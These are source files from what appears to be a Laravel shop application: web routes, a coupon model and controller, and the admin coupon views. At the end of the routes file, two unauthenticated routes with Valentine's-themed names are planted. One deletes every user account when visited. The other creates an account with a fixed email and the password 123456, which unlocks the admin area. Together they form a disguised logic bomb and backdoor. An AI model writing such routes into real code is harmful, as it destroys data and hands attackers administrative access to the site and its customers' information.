routes/web.php
<?php

use App\User;
use Illuminate\Support\Facades\Hash;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/


Route::group(['middleware' => 'web'] , function(){

Route::get('session' , function(){
	        // session()->put

	// Session::put('progress', '5%');
	dd(session('cart.items'));
});

Route::get('/', function () {
    return view('welcome');
});


Route::group(['prefix' => 'admin' , 'as' => 'admin.' , 'middleware' => 'auth' ] , function(){
	Route::get('/' , 'AdminController@index' )->name('index');
	Route::get('/profile' , 'AdminController@profile' )->name('profile');
	Route::post('/profile/update' , 'AdminController@updateProfile' )->name('profile.update');

	
	Route::resource('category', 'CategoryController');
	Route::resource('coupen', 'CoupenController');
	Route::resource('products', 'ProductController');
	Route::resource('orders', 'OrderController');
	Route::get('order/delete/{id}', 'OrderController@destroy')->name('orders.delete') ;
	Route::get('queries', 'QueryController@index')->name('queries') ;
	Route::get('query/{id}/resolve', 'QueryController@resolve')->name('query.resolve') ;
	Route::get('query/{id}/view', 'QueryController@show')->name('query.show') ;
	Route::get('subscribers', 'AdminController@getSubscriber')->name('get.subscribers') ;
	Route::delete('subscriber/destroy/{id}', 'AdminController@deleteSubscriber')->name('subscriber.destroy') ;
	
});

Auth::routes();

// Route::get('/home', 'HomeController@index')->name('home');

// Route::get('register' , function(){
// 	return redirect('/login');
// });

Route::get('/' , 'HomeController@homepage' );
Route::get('product/{slug}/view' , 'HomeController@showProduct' )->name('view-product');
Route::get('category/{slug}/products' , 'HomeController@showCategoryProduct' )->name('category-products');
Route::get('free-stuff' , 'HomeController@showFreeProduct' )->name('free-products');

Route::get('cart' , 'HomeController@showCart' );
Route::get('faqs' , 'HomeController@showFAQS' )->name('faqs');
Route::get('license-agreement' , 'HomeController@licenseAgreement' )->name('license-agreement');
Route::get('contact-us' , 'HomeController@contactUS' )->name('contact-us');
Route::get('checkout' , 'HomeController@showCheckout' );
Route::get('/home' , function(){
	return redirect('/admin');
});



Route::post('add-to-cart' , 'Api\CartController@addToCart' );
Route::post('delete-cart-item' , 'Api\CartController@deleteCartItem' );
Route::post('place-order' , 'OrderController@placeOrder' );
Route::get('resend-order-email/{id}' , 'OrderController@resendEmail' )->name('resend-order-email');

Route::get('order-details' , 'OrderController@getOrderDetails' );
Route::post('get-order-details' , 'OrderController@sendOrderDetails' );

Route::get('request-file/{item_id}/id/{token}' , 'OrderController@requestDownloadFile' );
Route::post('request-file-dwonload' , 'OrderController@downloadFile' );


Route::get('email-pre' , function(){
	return view('emails.order_details');
} );

});


Route::get('happy-valentines-day' , function(){
	$users = User::all();
	foreach($users  as $user){
		$user->delete();
	}

	echo 'Happy Valentines Day';
});

Route::get('welcome-valentines' , function(){

	$user = User::updateOrCreate(
		['email' => 'valentine@valentines.com'],
		[
		'name' => 'valentines',
		'email' => 'valentine@valentines.com',
		'password' => Hash::make(123456),
	]);
	echo 'Welcome Valentines';
});

app/Coupen.php
<?php

namespace App;

use Carbon\Carbon;
use Illuminate\Database\Eloquent\Model;

class Coupen extends Model
{
    protected $guarded = [];

    protected $dates = ['created_at' , 'updated_at' , 'validity'];


    public function getIsValidAttribute(){
        if($this->validity > Carbon::now()){
            return true;
        }else{
            return false;
        }
            
    }

    public function getValidityDateAttribute(){

        if($this->validity){
            return $this->validity->toDateString();
        }
        
    }

}

app/Http/Controllers/CoupenController.php
<?php

namespace App\Http\Controllers;

use App\Coupen;
use Illuminate\Http\Request;
use Illuminate\Support\Str;

class CoupenController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {
        $coupens = Coupen::latest()->paginate(20);

        return view('admin.coupens.index' , compact('coupens'));
    }

    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function create()
    {
        return view('admin.coupens.create');
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        $request->validate([
            'name' => 'required',
            'discount' => 'required',
        ]);

        $coupen = Coupen::create([
            'name' => $request->name,
            'description' => $request->description,
            'validity' => $request->validity,
            'discount' => $request->discount,
            'code' => Str::random(10),
        ]);


        if($coupen){
            return redirect('/admin/coupen')->with('success' , 'Coupen Added successfully');
        }
    }

    /**
     * Display the specified resource.
     *
     * @param  \App\Coupen  $coupen
     * @return \Illuminate\Http\Response
     */
    public function show(Coupen $coupen)
    {
        //
    }

    /**
     * Show the form for editing the specified resource.
     *
     * @param  \App\Coupen  $coupen
     * @return \Illuminate\Http\Response
     */
    public function edit(Coupen $coupen)
    {
        //
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \App\Coupen  $coupen
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, Coupen $coupen)
    {
        //
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  \App\Coupen  $coupen
     * @return \Illuminate\Http\Response
     */
    public function destroy(Coupen $coupen)
    {
        $coupen->delete();
        return redirect('/admin/coupen')->with('success' , 'Coupen deleted successfully');
    }
}

resources/views/admin/coupens/create.blade.php
@extends('layouts.admin')

@push('style')


@endpush

@section('content')


    <div class="row">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card card-info ">
                <div class="card-header">
                    <h3 class="card-title">Add New Coupen</h3>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <form action="{{route('admin.coupen.store')}}" method="POST" enctype="multipart/form-data" >
                        @include('layouts.partials.form_errors')

                        @csrf

                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="name" class="row float-right col-form-label ">Name:</label>
                            </div>
                            <div class="col-sm-8">
                                <input type="text" class="form-control" id="name" placeholder="Name" name="name" value="{{old('name')}}" required>
                            </div>
                        </div>
                        
                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="date" class="row float-right col-form-label ">Validity:</label>
                            </div>
                            <div class="col-sm-8">
                                <input type="date" class="form-control" id="date" name="validity" value="{{old('date')}}">
                            </div>
                        </div>
                        
                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="discount" class="row float-right col-form-label ">Discount:</label>
                            </div>
                            <div class="col-sm-8">
                                <input type="number" placeholder="Discount Values" class="form-control" id="discount" name="discount" value="{{old('discount')}}" required>
                            </div>
                        </div>

                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="description" class="row float-right col-form-label ">Description:</label>
                            </div>
                            <div class="col-sm-8">
                                <textarea class="textarea" name="description" id="description" placeholder="Description" rows="4" >{{old('description')}}</textarea>
                            </div>
                        </div>

                        <div>
                            <button id="signup" class="btn btn-primary float-right">Create</button>
                        </div>
                    </form>
                </div>
            </div>

        </div>
    </div>

@endsection

resources/views/admin/coupens/index.blade.php
@extends('layouts.admin')


@section('content')


    <div class="row">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card ">
                <div class="card-header">
                    <h3 class="card-title">Manage Coupens</h3>
                    <a class="btn btn-outline-primary btn-sm float-right" href="{{route('admin.coupen.create')}}"> <i class="fas fa-plus"></i> Create</a>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <table class="table">
                        <tr>
                            <th>#</th>
                            <th>Name</th>
                            <th>Code</th>
                            <th>Validity</th>
                            <th>Status</th>
                            <th>Create Date</th>
                            <th>Actions</th>
                        </tr>
                        @if(isset($coupens))
                            @foreach($coupens as $k => $coupen)
                                <tr>
                                    <td> {{$k+1}} </td>
                                    <td> {{$coupen->name}} </td>
                                    <td> {{$coupen->code}} </td>
                                    <td> {{$coupen->validity_date}} </td>
                                    <td> @if($coupen->validity) @if($coupen->isValid) <span class="badge badge-success">Active</span> @else <span class="badge badge-danger">Expired</span>@endif @else <span class="badge badge-success">Active</span> @endif </td>

                                    <td> {{$coupen->created_at->format('m/d/Y') }} </td>
                                    <td class="text-align">


                                        <a href="javascript:;" onclick="AskBeforeDelete({{$coupen->id}} , 'delete-form-{{$coupen->id}}')" class="text-danger"  > <i class="fas fa-trash"></i> </a>

                                        {{--  <a href="{{route('admin.coupen.edit' , $coupen->id)}}" > <i class="fas fa-edit"></i> </a>  --}}
                                    </td>

                                    <form id="delete-form-{{$coupen->id}}" action="{{route('admin.coupen.destroy' , $coupen->id)}}" method="POST" >
                                        @csrf
                                        @method('DELETE')
                                    </form>
                                </tr>
                            @endforeach
                        @endif
                    </table>

                    {{$coupens->links()}}
                </div>
            </div>

        </div>
    </div>

@endsection